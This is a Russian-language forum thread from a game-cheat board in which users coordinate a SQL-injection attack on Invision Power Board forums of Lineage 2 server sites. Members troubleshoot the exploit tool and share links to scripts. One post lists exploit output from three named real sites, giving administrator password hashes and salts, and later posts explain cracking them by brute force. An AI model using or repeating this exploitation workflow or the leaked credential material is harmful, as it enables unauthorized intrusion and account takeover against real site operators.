Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Рабочая уязвимость на l2europe.net (сервер из топ15)

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Закрытая тема
 
Опции темы
Старый 21.03.2010, 23:11   #16
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от Death_AnGelПосмотреть сообщение
у меня другая проблема - ввожу тип атаки урл етц. и мне опять показывают искходный код скрипта, как если бы я просто прописал его запуск x_x

такое и у меня
мб кто подскажет как это можно решить или что не так делаем
 
Старый 21.03.2010, 23:17   #17
 Пехотинец
Аватар для fuzzion
 
fuzzion на правильном пути
Регистрация: 08.02.2010
Сообщений: 62
Популярность: 52
Сказал(а) спасибо: 21
Поблагодарили 21 раз(а) в 13 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

[Ссылки могут видеть только зарегистрированные пользователи. ]

попробуй этот скрипт, мне помогло.
 
Пользователь сказал cпасибо:
CeDou (21.03.2010)
Старый 21.03.2010, 23:23   #18
 Разведчик
Аватар для mandarinko
 
mandarinko никому не известный тип
Регистрация: 17.11.2009
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!

как определить sql prefix?
либо префикс правильный, но стоит защита?
 
Старый 21.03.2010, 23:28   #19
 Разведчик
Аватар для mandarinko
 
mandarinko никому не известный тип
Регистрация: 17.11.2009
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

кину пару сайтов, если расскажешь, че делать с префиксом. Дефолтный не принимает.
 
Старый 21.03.2010, 23:33   #20
Почетный Пользователь
 Капитан
Аватар для ExxtanzO
 
ExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского Союза
Регистрация: 21.12.2009
Сообщений: 251
Популярность: 6587
Золото Zhyk.Ru: 30
Сказал(а) спасибо: 223
Поблагодарили 533 раз(а) в 200 сообщениях
Отправить сообщение для ExxtanzO с помощью ICQ Отправить сообщение для ExxtanzO с помощью Skype™
 
Wink Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Практикуйтесь на здоровье...
Код:
+ http://l2storm.com/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 1
 / Trying to get the password hash
 + pass_hash=abb647bada07836fc473eda72ef54884
 + Ok, using hash abb647bada07836fc473eda72ef54884
 / Trying to get the password salt
 + pass_salt=X&X^M
 + Ok, using salt X&X^M
 + Enjoy!
 
 + http://newlands-servers.com/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 3
 / Trying to get the password hash
 + pass_hash=5e635b8524bb078033c520594e1d1e16
 + Ok, using hash 5e635b8524bb078033c520594e1d1e16
 / Trying to get the password salt
 + pass_salt=v,6#{
 + Ok, using salt v,6#{
 + Enjoy!

 + http://thevoshod.ru/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 2
 / Trying to get the password hash
 + pass_hash=3b08fdb1aa90e8f4dac074dfeb62a5ad
 + Ok, using hash 3b08fdb1aa90e8f4dac074dfeb62a5ad
 / Trying to get the password salt
 + pass_salt=*El?}
 + Ok, using salt *El?}
 + Enjoy!
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 21.03.2010, 23:38   #21
 Разведчик
Аватар для mandarinko
 
mandarinko никому не известный тип
Регистрация: 17.11.2009
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

пол инета перерыл в поисках ответа
Sql prefix, как я понял, можно менять, при этом знать его будет только адм. следовательно сплойтом уже не побалуешься?)
 
Старый 21.03.2010, 23:40   #22
 Разведчик
Аватар для fall0ut
 
fall0ut на правильном пути
Регистрация: 08.03.2010
Сообщений: 2
Популярность: 24
Сказал(а) спасибо: 0
Поблагодарили 7 раз(а) в 2 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

[Ссылки могут видеть только зарегистрированные пользователи. ] вот ещё для практики
 
Старый 21.03.2010, 23:44   #23
 Разведчик
Аватар для BuT9H(забыл пасс)
 
BuT9H(забыл пасс) набедокурил в прошлом
Регистрация: 16.03.2010
Сообщений: 5
Популярность: -1
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Скачал видео включил музыка идет но картинки нету,что делать?
________________
Цитата:
Сообщение от gladvozПосмотреть сообщение
бери базы что на жуке , и ручками перебирай, чем ждать что кто то пробрутит для тебя.

Цитата:
Сообщение от zik-hackПосмотреть сообщение
что за жук?

 
Старый 21.03.2010, 23:46   #24
 Разведчик
Аватар для mandarinko
 
mandarinko никому не известный тип
Регистрация: 17.11.2009
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от BuT9H(забыл пасс)Посмотреть сообщение
Скачал видео включил музыка идет но картинки нету,что делать?

кодеки обнови.


+ [21.03.2010 22:44:30]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!

вот эта ситуация меня интересует...
 
Старый 21.03.2010, 23:48   #25
обжигающий
 Главнокомандующий
Аватар для object
 
object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(
Регистрация: 17.11.2009
Сообщений: 1,062
Популярность: 64819
Золото Zhyk.Ru: 170
Сказал(а) спасибо: 1,456
Поблагодарили 2,062 раз(а) в 822 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

[Ссылки могут видеть только зарегистрированные пользователи. ]


________________
Полные взломы игрулек VK:
Качок | Баббла Кадабра | Академия монстров | Клуб Искателей(?fix) | [HOT-NEW] Толстая птица онлайн
 
Старый 22.03.2010, 00:37   #26
 Разведчик
Аватар для Ingi
 
Ingi никому не известный тип
Регистрация: 14.03.2010
Сообщений: 6
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

объясните пожалуйста, почему пишет вот такую фигню:

Attack(s):

+ [21.03.2010 23:34:58]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
+ Forum vulnerable!
/ Using default table prefix: ibf_<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
- Prefix ibf_ is incorrect!<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
- Mysql version 4
- Get prefix impossible!

+ [21.03.2010 23:35:03]
+ Total: 3
 
Старый 22.03.2010, 00:47   #27
Читер-спонсор
 Рыцарь-защитник
Аватар для Nickitee
 
Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(
Регистрация: 28.08.2009
Сообщений: 603
Популярность: 19129
Золото Zhyk.Ru: 500
Сказал(а) спасибо: 84
Поблагодарили 602 раз(а) в 321 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Народ, вот получил Hash и Salt, что дальше?
Какие настрокйи в Passpro выставлять желательно поподробней )
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.
 
Старый 22.03.2010, 00:49   #28
 Разведчик
Аватар для Ingi
 
Ingi никому не известный тип
Регистрация: 14.03.2010
Сообщений: 6
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

наверно тебе сюда http://zhyk.ru/forum/showthread.php?t=80273 =)
 
Старый 22.03.2010, 00:53   #29
Читер-спонсор
 Рыцарь-защитник
Аватар для Nickitee
 
Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(
Регистрация: 28.08.2009
Сообщений: 603
Популярность: 19129
Золото Zhyk.Ru: 500
Сказал(а) спасибо: 84
Поблагодарили 602 раз(а) в 321 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Ну вот, я ввёл в [Ссылки могут видеть только зарегистрированные пользователи. ]
Хеш, салт, получил MD5, пошол в passpro, ввёл туда этот MD5, нажал брут форс, он у мя дет минут 10 пароли перебирал и ничего не нашол!
что я не так делаю? Oo
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.
 
Старый 22.03.2010, 01:07   #30
 Разведчик
Аватар для Ingi
 
Ingi никому не известный тип
Регистрация: 14.03.2010
Сообщений: 6
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

на сайт не надо ничего вводить.
хеш и соль надо в проге писать, а настройка по ссылке которую я скинул

Последний раз редактировалось Ingi; 22.03.2010 в 01:12.
 
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
l2europe dtg Базы серверов и брут 15 23.03.2010 16:04
l2europe.net phreaker Архив 25 21.03.2010 19:33
[Помогите!] У меня не сохраняется топ15, ранк!! semenronaldo9 Общение и обсуждение Counter-Strike 9 21.03.2010 15:30

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 03:03.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net